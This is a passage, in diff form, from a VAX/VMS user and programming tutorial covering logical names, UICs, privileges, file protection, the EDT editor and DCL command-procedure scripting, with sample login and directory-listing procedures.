+              programs executing in your account.  By default, SYS$INPUT is
+              equated to your terminal for interactive processes and to the
+              batch job stream (or command procedure) for batch processes.
+
+
+Logical Name Tables
+~~~~~~~~~~~~~~~~~
+Logical names are stored in system files called logical name tables.
+The following are the four most commonly used:
+
+Group table  :  Contains the logical names available to all users in your
+                UIC (User Identification Code) group.
+Job table    :  Contains the logical names available to your process and
+                any subprocess it creates.
+Process table:  Contains the logical names available to your process only.
+System table :  Contains the logical names that may be used by all users
+                of the system.
+
+
+User Environment
+~~~~~~~~~~~~~~
+The User Authorization File (UAF) is a system file controlled and modified
+by the system manager.  A record for each system user is contained in the
+UAF.
+
+A User Identification Code (UIC) is an identifier used by VAX/VMS to identify
+users and groups of users.  It is used to identify processes, directories,
+files, and other objects in the system.  A UIC may be specified numerically or
+alphanumerically, and is made up of two parts, a group and a member, specified
+in the format: [group,member].  For example, UIC [10,14] identifies group 10,
+user 14.  The group number is an octal number in the range 1-37776, and the
+member is an octal number in the range 0-177776.  An alphanumeric UIC contains
+a member name and optionally, a group name in the format: [member] or
+[group,member].  The group and member names in an alphanumeric UIC may contain
+1 to 31 alphanumeric characters (A-Z, 0-9, underscore, dollar sign).
+
+Each user of the system is limited in the consumption of system
+resources, and these limits control the rate at which your process or
+any subprocesses you create may consume a resource.  There are 32 levels
+of priority in the VAX/VMS system, 0 through 31, the highest being 31.
+The priorities are divided into two ranges: timesharing (0-15) and
+real-time (16-31).  The default user priority is 4.  Depending on how
+heavily the system is being used, your priority may be raised above the
+default, but never lowered below it.  VAX/VMS maintains 35 privileges,
+divided into the following seven categories classified by how much
+damage could be done to the system by possessing them:
+
+None    No privileges.
+Normal  The minimum privilege needed to use the system effectively.
+Group   The ability to effect members of the same UIC group.
+Devour  The potential to consume noncritical system-wide resources.
+System  The ability to interfere with normal system operation.
+File    The potential to bypass file protection security.
+All     The ability to take over the entire system.
+
+VAX/VMS systems keep a record of overall computer system use by account
+holder in a system file called ACCOUNTING.DAT.  The system manager uses
+this file to produce reports with the Accounting Utility.  This can be
+used to learn more about how the system is being used, how it performs,
+and how a particular user is using the system.  It can also be used to
+bill users for system time.
+
+
+Terminal Characteristics
+~~~~~~~~~~~~~~~~~~~~~~
+Setting display width:  $ SET TERMINAL/WIDTH=132
+
+Shutting messages off:  $ SET TERMINAL/NOBROADCAST
+  This prevents other users from phoning you, sending mail messages, and
+  some system messages from appearing on your screen.  If you just want
+  mail and phone messages screened, use: $ SET BROADCAST=(NOMAIL,NOPHONE).
+
+Increasing type-ahead buffer:  $ SET TERMINAL/ALTYPEHD/PERMANENT
+
+Line editing modes:  $ SET TERMINAL/INSERT or $ SET TERMINAL/OVERSTRIKE
+
+Defining keys:  $ DEFINE/KEY PF1 "SET DEFAULT DUA3:[INV.SUP]"
+                % DCL-I-DEFKEY, DEFAULT key PF1 has been defined
+
+Showing keys:   $ SHOW KEY PF1      (or $ SHOW KEY ALL)
+                DEFAULT keypad definitions:
+                   PF1 = "SET DEFAULT DUA3:[INV.SUP]"
+
+Deleting keys:  $ DELETE/KEY PF1    (or $ DELETE/KEY ALL)
+                % DCL-I-DELKEY, DEFAULT key PF1 has been deleted
+
+
+Changing prompt:  $ SET PROMPT = "What now?"
+
+Displaying process information:  $ SHOW PROCESS  (add a qualifier)
+
+Changing process information:  $ SET PROCESS/NAME="Bob"
+                               $ SET PROCESS/PRIVILEGES=OPER
+
+
+File Security
+~~~~~~~~~~~~
+UIC-based protection permits access to be granted or denied based on
+protection codes that reflect four user categories:
+
+System:  system manager
+Owner :  account owner
+Group :  users in same UIC group
+World :  all users of system, regardless of UIC
+
+Four type of file access can be granted or denied to members of these user
+categories:
+
+Read    (R): read the file
+Write   (W): create or modify the file
+Execute (E): run a program
+Delete  (D): delete the file
+
+Generally, any category of user can be granted or denied file access
+with this protection scheme.  However, you can read a file in a
+subdirectory with EXECUTE access if you know its filename and filetype.
+Also, since SYSTEM privileges include the ability to bypass all file
+protection, anyone within the SYSTEM category can read a file.
+
+CONTROL access, or the ability to change the protection and ownership of
+a volume, is never specified in the UIC-based protection code.  This is
+the fifth type of protection that can be specified in an access control
+list (ACL).  It's automatically granted to two user categories when VMS
+examines UIC-based protection.  Users in the SYSTEM and OWNER categories
+receive CONTROL access by default while GROUP and WORLD categories are
+denied CONTROL access.
+
+File protection defaults are as follows:
+
+System:  RWED
+Owner :  RWED
+Group :  RE
+World :  No access
+
+To determine the existing or default protection of a file, use the SHOW
+PROTECTION command.  The default in the previous example would be:
+   $ SHOW PROTECTION
+       SYSTEM=RWED, OWNER=RWED, GROUP=RE, WORLD=NO ACCESS
+
+If you want to see file protection in directories, use the /PROTECTION
+qualifier with the DIRECTORY command.
+
+To change the protection of a file, use the command:
+
+   $ SET PROTECTION=(O:RWE,G,W) LOGIN.COM
+
+In this example, the account owner has READ, WRITE, and EXECUTE access
+to his LOGIN.COM file.  The GROUP and WORLD categories have no access
+and SYSTEM access remains unchanged.
+
+Rules for specifying protection codes:
+1.  Access types must be abbreviated with one letter: R, W, E, or D.
+2.  User categories may be spelled out or abbreviated.
+3.  Each user category must be separated from its access types with a colon.
+4.  If you specify multiple user categories, separate each with a comma
+    and enclose the entire code in parenthesis.
+5.  User categories and access types may be specified in any order.
+6.  If you include a user category, but do not specify an access type
+    for that category, access is automatically denied.
+7.  If you omit a user category entirely, protection for that category
+    is unchanged.
+
+Remember that VAX/VMS evaluates directory protection before file
+protection.  If you grant WORLD:R access to a file, but the file is in a
+directory without WORLD:R access, another user couldn't read the file.
+
+
+EDT Text Editor
+~~~~~~~~~~~~~~
+When you enter EDT, you automatically enter line mode, indicated by the
+EDT prompt, an asterisk (*).  All line mode commands are made at the
+asterisk prompt and terminated by pressing <Return>.  Lines that you
+input are numbered sequentially by the editor.  You can reference a line
+or group of li^S^Qnes based on the line number or range of line numbers.  A
+list of basic EDT commands follows.  Each command may be abbreviated to
+the characters in parenthesis.  Complete information on all EDT line
+mode commands can be found through the use of the line mode EDT HELP
+command.
+
+Commands          Function
+~~~~~~~         
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Change (C)        Change from line to keypad mode.  To switch back from
+                  keypad mode to line mode, press <Ctrl-Z>.
+Copy (CO)         Copy a line or group of lines from one place to another.
+                  If you enter the command CO 5 to 10, line 5 will be
+                  copied to the line immediately preceding line 10.  The
+                  command CO 5:10 to 20 would copy the contents of lines 5
+                  through 10 into the area immediately preceding line 20.
+Delete (D)        Delete a line or group of lines.  The command D13 would
+                  delete line 13, while D13:20 will delete lines 13 to 20.
+Exit (EX)         Terminates the EDT session, saving all changes.  This
+                  also creates a new version of the file being edited.
+Help (H)          Display on-line help on all EDT line mode commands.  The
+                  help messages will not be included in the file being edited.
+Include (INC)     Copy text from an external file into the file being edited.
+                  When the EDT command INCLUDE FILENAME.TYPE is executed,
+                  the contents of FILENAME.TYPE are copied into the file
+                  being edited.
+Insert (I)        Inserts specified text directly before the current
+                  position in the file.  While inserting text, you will
+                  not receive the EDT "*" prompt.  Press <Ctrl-Z> to
+                  return to the "*" prompt when you're finished inserting.
+Move (M)          You can't cut and paste with a line-oriented editor.
+                  Text will be moved to the area immediately preceding a
+                  specified line.  The command M 10:15 to 50 would move
+                  lines 10 through 15 to the area immediately preceding
+                  line 50.
+Quit (QUI)        Exit the EDT editor without saving changes.
+Replace (R)       Deletes a specified line or group of lines and enters the
+                  INSERT mode so you can add text in that place.  The
+                  command R5:10 would delete lines 5 through 10 and switch
+                  to the INSERT mode to permit you to enter new text.  To
+                  exit the INSERT mode, press <Ctrl-Z>.
+Resequence (RES)  Numbers all of the lines in the file that you're
+                  editing in increments of 1.  This is useful because
+                  text insertion, movement, or deletion causes the file
+                  to lose numeric sequence.
+Substitute (S)    Substitute a new text element for an old one in the
+                  format s/oldtext/newtext/range.  The old and new text
+                  elements must be enclosed in angle bracket (< >)
+                  delimiters and the range must be specified.
+Write (WR)        Write a given range of text to a new file.
+                  WRHISTORY.TXT 50:100 would write lines 50 through 100 to
+                  a new file called HISTORY.TXT.
+
+
+EDT Help Manual
+~~~~~~~~~~~~~
+To dump the entire EDT Help file to disk, enter the following DCL command
+during a terminal session:  $ ASSIGN EDTHELP.FIL SYS$OUTPUT.  Now, enter
+line mode EDT and type:  * HELP *.  Now exit EDT and enter the DCL
+command: $ ASSIGN TTnn: SYS$OUTPUTT (TTnn: is your terminal number).
+
+
+                  <:=- Part B : Programming VAX/VMS -=:>
+
+Introduction
+~~~~~~~~~~~
+A symbol is a name chosen to represent a string of characters, a numeric value,
+or a logical (true/false) value.  A symbol may be used wherever the value it
+represents would normally be found, and can be up to 255 characters long.
+Symbols must begin with a character, dollar sign, or underscore, and are not
+case-sensitive.  Symbols are created like this:
+
+   symbol_name = value    (local symbol)
+   symbol_name == value   (global symbol)
+
+A global symbol may be used at any command level, but local symbols are lost
+when command procedures are finished.  For example:
+
+   $ WIDE = "SET TERMINAL/WIDTH=132"
+
+Now, anytime you type WIDE at the DCL command line, the terminal width will
+be changed to 132 characters.  To show the contents of a symbol:
+
+   $ SHOW SYMBOL ANSWER
+      ANSWER = 1584    HEX = 00000630    OCTAL = 000000003060
+
+The SHOW SYMBOL command uses the local symbol table by default.  To show
+the value of a global symbol, use the /GLOBAL qualifier.  To show all
+symbols, use the /ALL qualifier (or /GLOBAL/ALL).  To delete symbols,
+use: $ DELETE/SYMBOL symbol_name command (with /GLOBAL if it's global).
+
+When a DCL command is executed, symbols in the following positions are
+automatically translated:
+
+  o  the beginning of the command
+  o  in a lexical function
+  o  in a WRITE or IF statement
+  o  on the right side of an = or == assignment statement
+  o  inside brackets on the left side of an assignment statement when
+     you're preforming string substitution
+
+If none of these cases fits, apostrophes will force the translation:
+   $ DIRECTORY 'PARTS'  (after $ PARTS = "DJA2:[DBA]PARTS.DAT")
+
+Symbols are commonly used for shorthand.  For example, to clear the screen:
+
+   $ ESC[0,8] == 27
+   $ CLEAR == "[J"
+   $ HOME  == "[H"
+   $ CLR == WRITE SYS$OUTPUT ESC,HOME,ESC,CLEAR
+
+Now, anytime you enter CLR, the screen will be cleared.  Symbols can also be
+used to execute command procedures:
+
+   $ NETBACK == "@SYS$LOGIN:NETBACKUP"
+
+Finally, foreign commands unknown to DCL can be executed by using symbols:
+
+   $ KERMIT == RUN SYS$$SYSTEM:KERMIT
+
+
+DCL Expressions
+~~~~~~~~~~~~~~
+Expressions are built by combining data elements with operators.  A logical
+comparison evaluates the relationship between two components as true or
+false (True = 1, False = 0).
+
+Lexical functions are VAX/VMS routines that return process or system
+information, or manipulate user-supplied data.  Lexical functions are unique
+because the result is returned in the function name, allowing it to be used as
+a symbol (much like Pascal).  Lexical functions are called with the following
+format:
+
+   F$function_name(parameter, parameter...)
+
+For example, the following lexical function manipulates user-supplied data:
+
+   $ STRING = "Go     home    right      now!"
+   $ STRING = F$EDIT(STRING, "COMPRESS, UPCASE")
+   $ SHOW SYMBOL STRING
+      STRING = "GO HOME RIGHT NOW!"
+
+
+Command Procedures
+~~~~~~~~~~~~~~~~~
+A command procedure is a file consisting of a sequence of DCL commands which
+can be executed interactively or as a batch job (like a .BAT file in MS-DOS or
+a REXX EXEC in VM/SP).  Command procedures are used in VAX/VMS to perform
+repetitive or complex tasks and to save time.  With a command procedure, you
+can execute many DCL commands with a single statement.
+
+Command procedures aren't bound by simple lists of DCL commands executed in
+sequence.  They can take advantage of labels, lexical functions, symbols and
+relational operators to build sophisticated procedures which act like VAX/VMS
+programs.  Command procedures are flexible.  They can be written to take
+specific actions based on responses to questions, or even to perform a given
+function depending on the time or date.
+
+
+Writing Command Procedures
+~~~~~~~~~~~~~~~~~~~~~~~
+A text editor such as EDT or EVE is used to create and edit command procedures,
+which should be named "PROCEDURE_NAME.COM".  The file type ".COM" is the
+default procedure file type, and if a different file type is included, it must
+be included when the procedure is invoked.
+
+Each new command line must begin with a dollar sign ($).  Multiple spaces or
+tabs may be included after the "$" for readability, and command lines may be
+extended past a single line by ending the previous line with a hyphen (-) and
+not starting the next line with a dollar sign.
+
+Data input to programs, such as responses, must be entered without the dollar
+sign.  Data lines are used by the program running and are not processed by the
+DCL command line interpreter.  For example:
+
+   $ MAIL         <--- invokes the Mail Utility
+   SEND           <--- Mail SEND command
+   JONES, BOB     <--- response to Mail prompt "To:"
+   Memo           <--- response to Mail prompt "Subj:"
+   Bob,           <--- Mail message
+
+   How's it going?'?
+
+   Joe
+   $              <--- terminates Mail program
+   $ EXIT         <--- terminates command procedure
+
+
+Comments
+~~~~~
+Comments may be included by preceding them with an exclamation point (!),
+which causes everything to the right of it to be ignored by the DCL command
+interpreter.  Comments make command procedures easier to debug and modify
+later.  Spelling DCL commands out rather than using the abbreviations also
+makes the command procedure more readable.
+
+
+Labels
+~~~
+Labels are used by the DCL command line interpreter for conditional
+processing and repetitive looping.  Labels should be placed on separate
+lines, making them easier to find.  Labels can be 255 characters long, may
+not contain blanks, and must be terminated with a colon (:).
+
+
+Debugging
+~~~~~~
+The SET VERIFY command tells DCL to display each command as it processes it.
+This allows you to see where errors are generated, and how strings are
+translated.  SET NOVERIFY turns the verify mode off.
+
+The SHOW SYMBOL command displays the contents of defined symbols, and is
+used to show the contents of a symbol in a command procedure as it is being
+executed.
+
+
+Invoking Command Procedures
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+Command procedures may be invoked interactively by typing the "at" sign (@)
+followed by the procedure name.  The file type must also be included if it is
+not ".COM" (the default).  Command procedures may be invoked at the command
+line or from within another command procedure, called nesting.  The DCL SUBMIT
+command will place your command (job) in a batch queue with other jobs waiting
+to be run.  Command procedures are generally submitted as batch jobs when you
+want them to execute at a specific time, they will take a long time to run, or
+when a job must run at a reduced priority.  The following command submits the
+command procedure ACCOUNT.COM to the VAX/VMS batch processor:
+
+   $ SUBMIT ACCOUNT
+   Job ACCOUNT (queue SYS$BATCH, entry 103) started on SYS$BATCH
+
+The SYS$BATCH queue is the default and is used unless otherwise specified with
+the /QUEUE qualifier.  When VAX/VMS runs this job, a process with your rights
+and privileges will be created and the procedure executed within that process.
+
+
+Symbols
+~~~~~~
+Symbols may be local (single equal sign) or global (double equal sign).
+Local symbols are recognized by DCL only at the command level at which it
+was defined and more deeply nested levels (subsequently called command
+procedures).  Global symbols are recognized at any command level.  Local
+symbols should be used when the symbols is only needed for the duration of
+the command procedure employing it.  You should only define global symbols
+if you're going to use them in other command procedures or for the duration
+of your login session.
+
+An asterisk can be used to tell the command line interpreter (CLI) to accept
+abbreviations.  For example:
+
+   $ NO*TES == "@SYS$LOGIN:NOTES"
+
+This tells the CLI to accept NO, NOT, NOTE, or NOTES as a valid abbreviation
+for the NOTES command.  This notation is usevul for long symbol names.
+
+
+Lexical Functions
+~~~~~~~~~~~~~~~~
+Lexical functions allow you to obtain basically the same information as DCL
+SHOW commands.  However, it's easier to manipulate information which comes
+from a lexical function.  As an example, the following two command give the
+same information:
+
+   $ SHOW TIME                  ! DCL SHOW TIME command
+       12-JUN-1989 14:29:23
+   $ WRITE SYS$OUTPUT F$TIME()  ! lexical function
+       12-JUN-1989 14:29:25.17
+
+The second command is more usable, however:
+
+   $!  Show_Date.COM
+   $!
+   $ TIME&DATE = F$TIME()
+   $ DATE = F$EXTRACT(0,11,TIME&DATE)
+   $ WRITE SYS$OUTPUT DATE
+
+This procedure displays only the date portion of the string returned by the
+lexical function F$TIME().  (Use @SHOW_DATE to invoke it) VAX/VMS supports
+lexical functions to manipulate text strings, convert data types, and return
+information about the system, your process, symbols, files and devices.
+
+
+Parameters
+~~~~~~~~~
+Eight reserved symbols (P1 through P8) are available to command procedures to
+supply data to process.  By using these parameters in a command procedure,
+different data can be specified each time it's run.  Parameter specification is
+done on the command line where the procedure is called.  Unless designed to,
+the command procedure will not prompt for parameters.  Parameters are separated
+with spaces and may be character strings, integers, or symbols.  If you want to
+skip a parameter, us a null string (" ").
+
+   $! Add.Com
+   $! command procedure to demonstrate passing parameters
+   $! (add the first and third parameter)
+   $!
+   $  WRITE SYS$OUTPUT P1+P3
+
+   $ @ADD 12 " " 14
+   26
+
+If a command procedure requires multiple letters or words as a single
+parameter, enclose it in quotes and it will be treated as one parameter and
+not converted to uppercase.
+
+
+Terminal Output
+~~~~~~~~~~~~
+The WRITE and TYPE commands send data to the terminal.  TYPE is used to
+display the contents of a file, but may also be used to print lines of text
+from within a command procedure.  TYPE may only be used to output text
+strings.  Since the WRITE command is processed be DCL, expressions, symbols
+and lexical functions are evaluated before the data is sent to the
+terminal.
+
+The output expression must translate to a string and be sent to the logical
+device SYS$OUTPUT, but may be a string, lexical function, symbol, or any
+combination of the three.  Here's an example of a command procedure that
+uses terminal output:
+
+   $! Writing a simple text string
+   $!
+   $  WRITE SYS$OUTPUT "This is a test..."
+   $!
+   $! Displaying multiple lines at the terminal
+   $!
+   $  TYPE SYS$OUTPUT Warning!
+          It's been 30 days since you changed
+          your password.  Change it now!
+   $!
+   $! Writing a string with a lexical function
+   $!
+   $  WRITE SYS$OUTPUT " "HI' You are in directory "F$DIRECTORY()' "
+
+
+Terminal Input
+~~~~~~~~~~~
+The INQUIRE command's default device is the terminal keyboard, while the
+READ command must be told where to accept data from.  The INQUIRE command
+prompts for input, reads data and assigns it to a symbol.  All data is
+accepted as a character string and is converted to uppercase and compressed
+(extra blanks removed).  The READ command prompts for input if the /PROMPT
+qualifier is used, accepts data from a specified source and assigns it to a
+symbol.  The data is accepted with no string conversion or compression
+occurring.  Here's an example of a command procedure that uses terminal
+input:
+
+   $! Puts whatever you type in the symbol NAME
+   $! the /NOPUNCTUATION qualifier will suppress the colon
+   $! and space INQUIRE puts at the end of the prompt
+   $!
+   $  INQUIRE /NOPUNCTUATION NAME "What is your name? "
+   $!
+   $! Example of READ using SYS$INPUT (terminal) for data
+   $!
+   $  READ /PROMPT = "First value: " SYS$INPUT VALUE_1
+   $  READ /PROMPT = "Second value: " SYS$INPUT VALUE_2
+   $  WRITE SYS$OUTPUT VALUE_1," + ",VALUE_2," = ",VALUE_1+VALUE_2
+
+
+File I/O
+~~~~~~~
+The basic steps to read and write files from within command procedures are
+similar to most other languages.  Use the OPEN command to open the file.  If it
+does not exist, OPEN will create it.  Use the READ or WRITE commands to read or
+write text records from the file.  Use the CLOSE command to close the
+ file when you're done.
+
+To open a file for writing, you must use the /APPEND or /WRITE qualifier.  The
+/WRITE qualifier creates a new file and places the record pointer at the
+beginning of the file.  If the file already exists, a new version will be
+created by OPEN/WRITE.  The /APPEND qualifier is used to add records to the end
+of an existing file.  The file must already exist before using the OPEN/APPEND
+command, and when the file is opened, the record pointer is placed at the end
+of the file.
+
+To open a file for reading, use the /READ qualifier (the default for the
+OPEN command).  A file opened for reading may not be written to, and the
+record pointer will initially be placed at the first record in the file.
+Each time a record is read, the pointer is moved down to the next record.
+The WRITE/UPDATE must be used to write over an existing record. Here's an
+example of a command procedure using file input and output:
+
+   $ OPEN/APPEND OUTPUT_FILE NEW.DAT
+   $ OPEN/READ INPUT_FILE OLD.DAT
+   $ READ INPUT_FILE RECORD
+   $ WRITE SYS$OUTPUT "First record from OLD.DAT - ",RECORD
+   $ WRITE OUTPUT_FILE "First record from OLD.DAT - ",RECORD
+
+To open a file for both reading and writing, use both the /READ and /WRITE
+qualifiers.  The record pointer will be placed at the first record in the file.
+Using this method, however, you can only overwrite the record you most recently
+read, and records you replace must be the same length.
+                                                   
+
+Redirecting Command Procedure I/O
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Command procedures often invoke VAX/VMS utilities, and these programs will
+normally get input from the logical device SYS$INPUT.  While executing a
+command procedure, SYS$INPUT is directed to the command procedure itself, and
+this is why you can put command and data lines for a utility or program
+directly in the procedure.  SYS$COMMAND defaults to the terminal from where a
+command procedure is being executed, and by redirecting SYS$INPUT to
+SYS$COMMAND you can use utilities and other programs interactively from command
+procedures:
+
+   $ DEFINE/USER_MODE SYS$INPUT SYS$COMMAND:
+   $ EDIT JUNK.DAT
+
+The /USER_MODE qualifier causes the re-assignment to be in effect only for
+the next command.
+
+Normally command procedure output is displayed at your terminal.  You may
+redirect output to a file by using the /OUTPUT qualifier:
+
+    $ @SHOW_TIME/OUTPUT = TIME.DAT
+
+By default, DCL error and severe error messages are directed to the file
+represented by the logical name SYS$ERROR, which usually points to your
+terminal.  If you want to log error messages, simply redirect SYS$ERROR to
+a file.  If you redirect SYS$ERROR without also redirecting SYS$OUTPUT, DCL
+will send error messages to both, and you'll receive the error messages
+twice -- at your terminal and in the file.
+
+To completely suppress error messages you can redirect both SYS$ERROR
+and SYS$OUTPUT to the null device (NL:) or you can use the SET MESSAGE
+command to turn off all message output.  To suppress all messages, use:
+SET MESSAGE/NOTEXT/NOIDENTIFICATION/NOFACILITY/NOSEVERITY.
+
+
+Branching and Conditionals
+~~~~~~~~~~~~~~~~~~~~~~~~~
+You can use the DCL IF/THEN statements and conditional operators withing
+command procedures to cause the execution of a command based on the
+evaluation of a condition.  The basic use is:  $ IF condition THEN command.
+The condition is a Boolean expression (True or False) and the command is
+any legal DCL command.  The following is a list of conditional operators:
+
+Operator        Function
+~~~~~~~       
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+.EQ. / .EQS.    Determines if two numbers/character strings are equal
+.GE. / .GES.    Tests to see whether the first number/character string is
+                greater than or equal to the second
+.GT. / .GTS.    Determines if the first number/character string is greater
+                than the second
+.LE. / .LES.    Tests to see if the first number/character string is less
+                than or equal to the second
+.LT. / .LTS.    Determines if the first number/character string is less than
+                the second
+.NE. / .NES.    Tests to see whether the two numbers/character strings are
+                not equal
+.AND.           Combines two numbers with a logical AND   (boolean algebra)
+.OR.            Combines two numbers with a logical OR    (boolean algebra)
+.NOT.           Logically negates a value
+
+The following is a command procedure using conditional branching:
+
+   $! Time.Com
+   $!
+   $    TIME = F$TIME()
+   $    HOUR = F$EXTRACT(12,2,TIME)
+   $    IF HOUR .LT. 12 THEN GOTO MORNING
+   $    IF HOUR .LT. 17 THEN GOTO AFTERNOON
+   $    IF HOUR .LT. 18 THEN GOTO EVENING
+   $    GOTO END
+   $  MORNING:
+   $    WRITE SYS$OUTPUT "Good morning!"
+   $  AFTERNOON:
+   $    WRITE SYS$OUTPUT "Good afternoon!"
+   $  EVENING:
+   $    WRITE SYS$OUTPUT "Good evening!"
+   $  END:
+   $    EXIT
+
+
+Loops
+~~
+Loops are used to repeat a statement or group of statements until a
+given condition is met.  DCL supports both DO WHILE and DO UNTIL loops.
+The DO WHILE loop tests the condition before evaluation:
+
+   $ LOOP:
+   $    IF .NOT. condition THEN GOTO END
+     .
+     .
+     .
+   $    GOTO LOOP
+   $ END:
+   $    EXIT
+
+The DO UNTIL loop executes the statement(s) and then tests the condition:
+
+   $ LOOP:
+     .
+     .
+     .
+   $    IF condition THEN GOTO LOOP
+   $    EXIT
+
+
+Subroutines
+~~~~~~~~
+The DCL command GOSUB transfers execution control to a label and the RETURN
+command terminates subroutine execution, returning control to the statement
+after the GOSUB command.  Subroutines are useful where you need to do the same
+series of commands repeatedly in different parts of a command procedure.  They
+also make procedures easier to read and more compact.  The DCL commands GOSUB
+and RETURN are not supported in VAX/VMS versions before VAX/VMS Version 4.4.
+The following is an example procedure using a subroutine:
+
+   $! Personal.Com
+   $!
+   $!     opens the personal info file
+   $!
+   $  OPEN/WRITE OUTPUT_FILE PERINFO.DAT
+   $!
+   $!     collect info
+   $!
+   $  INQUIRE RECORD "Enter full name"
+   $  GOSUB WRITE_FILE
+   $  INQUIRE RECORD "Enter address"
+   $  GOSUB WRITE_FILE
+   $  INQUIRE RECORD "Enter phone number"
+   $  GOSUB WRITE_FILE
+   $  CLOSE OUTPUT_FILE
+   $  EXIT
+   $!
+   $!     subroutine WRITE_FILE
+   $!
+   $  WRITE_FILE:
+   $      WRITE OUTPUT_FILE RECORD
+   $      RETURN
+
+
+Error Handling
+~~~~~~~~~~~~~
+The command interpreter will execute an EXIT command if a severe error occurs,
+terminating the procedure and returning control to the previous command level,
+unless the DCL ON command is used to specify an action for the command
+interpreter to take.  The ON command supports the three keywords WARNING,
+ERROR, and SEVERE_ERROR.  To override error handling for procedure warnings,
+for example, use something like this:
+
+   $ ON WARNING THEN EXIT
+     or
+   $ ON WARNING THEN GOTO label
+
+WARNING causes the command procedure to take action if a warning, error, or
+severe error occurs.  ERROR causes the action if an error or severe error
+occurs, and SEVERE_ERROR causes the action only if a fatal error occurs.
+
+$STATUS and $SEVERITY are reserved DCL global symbols, and each time a command
+is executed, values are assigned to these symbols. $STATUS holds the full
+condition code of the last statement and $SEVERITY holds an error severity
+level.  The condition code in $STATUS is valid to the VAX/VMS MESSAGE facility
+and can be used in conjunction with F$MESSAGE to obtain the actual text message
+associated with the code:
+
+   $ SET DEFAULT DUB1:[BYNON]
+   $ WRITE SYS$OUTPUT $STATUS $X00000001
+   $ WRITE SYS$OUTPUT F$MESSAGE(%X00000001)
+   % SYSTEM-S-NORMAL, normal successful completion
+
+All DCL commands will return a condition code, but not all condition codes
+have text messages.  Condition codes without text messages will return the
+message "%NONAME-E-NOMSG Message number (8-digit code)".
+
+The message text isn't very useful for making conditional decisions though, so
+$SEVERITY is used.  It contains one of five possible values extracted from the
+first three bits of $STATUS.  Here are the codes:
+
+Code  Definition
+~~~  ~~~~~~~~~~
+ 0    Warning
+ 1    Success
+ 2    Error
+ 3    Information
+ 4    Severe Error
+
+Odd values (1,3) indicate success while even values (0,2,4) indicate failure.
+There are basically two ways to use the status and severity codes to handle
+errors.  The first is to treat $STATUS as a Boolean value:
+
+   $ SET NOON
+   $ command                         ! a DCL command
+   $ IF $STATUS THEN GOTO NO_ERR     ! test $STATUS for T or F
+     .
+     .                               ! handle the error
+     .
+   $ NO_ERR                          ! continue processing
+     .
+     .
+     .
+   $ EXIT
+
+The second method is to trap the error with the ON WARNING command, then use
+the severity level to determine an appropriate course of action:
+
+   $ SET NOON
+   $ ON WARNING GOTO ERR_TRAP
+   $ command                         ! a DCL command
+   $ command                         ! a DCL command
+     .
+     .
+     .
+   $ EXIT
+   $!
+   $! error trap code
+   $!
+   $ ERR_TRAP:
+   $    SEVERITY = $SEVERITY             ! save the error code
+   $    IF SEVERITY = 0 THEN command     ! if warning...
+   $    GOTO DONE
+   $    IF SEVERITY = 2 THEN command     ! if error...
+   $    GOTO DONE
+   $    IF SEVERITY = 4 THEN command     ! if severe error...
+   $ DONE:
+     .
+     .
+     .
+   $ EXIT
+
+Error checking can be completely disabled with the SET NOON command.  When
+this is in effect, the command interpreter continues updating the condition
+code, but does not perform any error checking.  The DCL command SET ON
+restors error checking to normal.  For example:
+
+   $ SET NOON      ! turn off error checking
+   $ command       ! a DCL command
+   $ SET ON        ! restor error checking
+
+
+Termination
+~~~~~~~~~~
+The EXIT command will terminate the current command procedure and return
+control to the command level that called it while the STOP command terminates
+all command procedures (if nested) and returns control to DCL.
+
+
+Example Command Procedures
+~~~~~~~~~~~~~~~~~~~~~~~~~
+The following are two example command procedures to demonstrate some of
+the previously discussed techniques.
+
+Login.Com
+~~~~~~~~
+   $! Login.Com - executed each time you log in
+   $!
+   $! Check for a network or batch login
+   $!
+   $      IF F$MODE() .EQS. "NETWORK" THEN GOTO NETWORK
+   $      IF F$MODE() .EQS. "BATCH" THEN GOTO BATCH
+   $!
+   $! Define process permanent symbols for convenience
+   $!
+   $      SD == "SET DEFAULT"
+   $      SH == "SET HOST"
+   $      WI*DE == "SET TERMINAL/WIDTH=132"
+   $      NA*RROW == "SET TERMINAL/WIDTH=80"
+   $      DIR*ECTORY == "DIRECTORY/SIZE"
+   $      PU*RGE == "PURGE/LOG/KEEP=2"            ! keep latest 2 version
+   $      HO*ME == "SET DEFAULT SYS$LOGIN:"
+   $      WHO == "SHOW USERS"
+   $      EVE == "EDIT/TPU"
+   $      EDT == "EDIT/EDT/COMMAND=SYS$LOGIN:EDTINI.EDT"
+   $      BR*OWSE == "TYPE/PAGE"
+   $!
+   $! Define special keys
+   $!
+   $      DEFINE/KEY/NOLOG/TERM PF1 "DIR"         ! term ends with <enter>
+   $      DEFINE/KEY/NOLOG PF2 "EDIT"
+   $      DEFINE/KEY/NOLOG/TERM/NOECHO PF3 "LOGOUT"
+   $      DEFINE/KEY/NOLOG/TERM/NOECHO HELP "SHOW KEY/ALL"
+   $!
+   $! Modify terminal characteristics
+   $!
+   $      SET TERMINAL/INSERT     ! insert mode
+   $      SET PROMPT = "[BYNON]> "
+   $!
+   $! Show time and quit
+   $!
+   $      SHOW TIME
+   $      EXIT
+   $!
+   $! If it's a network login, we can now
+   $! perform some other commands if desired.
+   $! Just quit for now though.
+   $!
+   $  NETWORK:
+   $      EXIT
+   $!
+   $! If it's a batch job login, set verification on and quit.
+   $!
+   $  BATCH:
+   $      SET VERIFY
+   $      EXIT
+
+
+Subdir.Com
+~~~~~~~~~
+   $! Subdir.Com - how to search and parse character strings
+   $!
+   $      WRITE SYS$OUTPUT F$DIRECTORY()+ " Subdirectories:"
+   $      WRITE SYS$OUTPUT " "
+   $!
+   $! Search for subdirectory names and display them on the terminal
+   $!
+   $  DIR$LOOP:
+   $      FILE = F$SEARCH("*.DIR")
+   $!
+   $! If DCL returns a null string (" ") we're done
+   $!
+   $      IF FILE .EQS. " "THEN GOTO END$DIR$LOOP
+   $!
+   $! Find the position of the period
+   $!
+   $      DOT = F$LOCATE(".",FILE)
+   $!
+   $! Find the position of the right bracket
+   $!
+   $      BRACKET = F$LOCATE("]",FILE)
+   $!
+   $! Extract the string between the dot and bracket
+   $!
+   $      FILE = F$EXTRACT(BRACKET+1,DOT-BRACKET-1,FILE)
+   $!
+   $! Display the subdirectory name and start over
+   $!
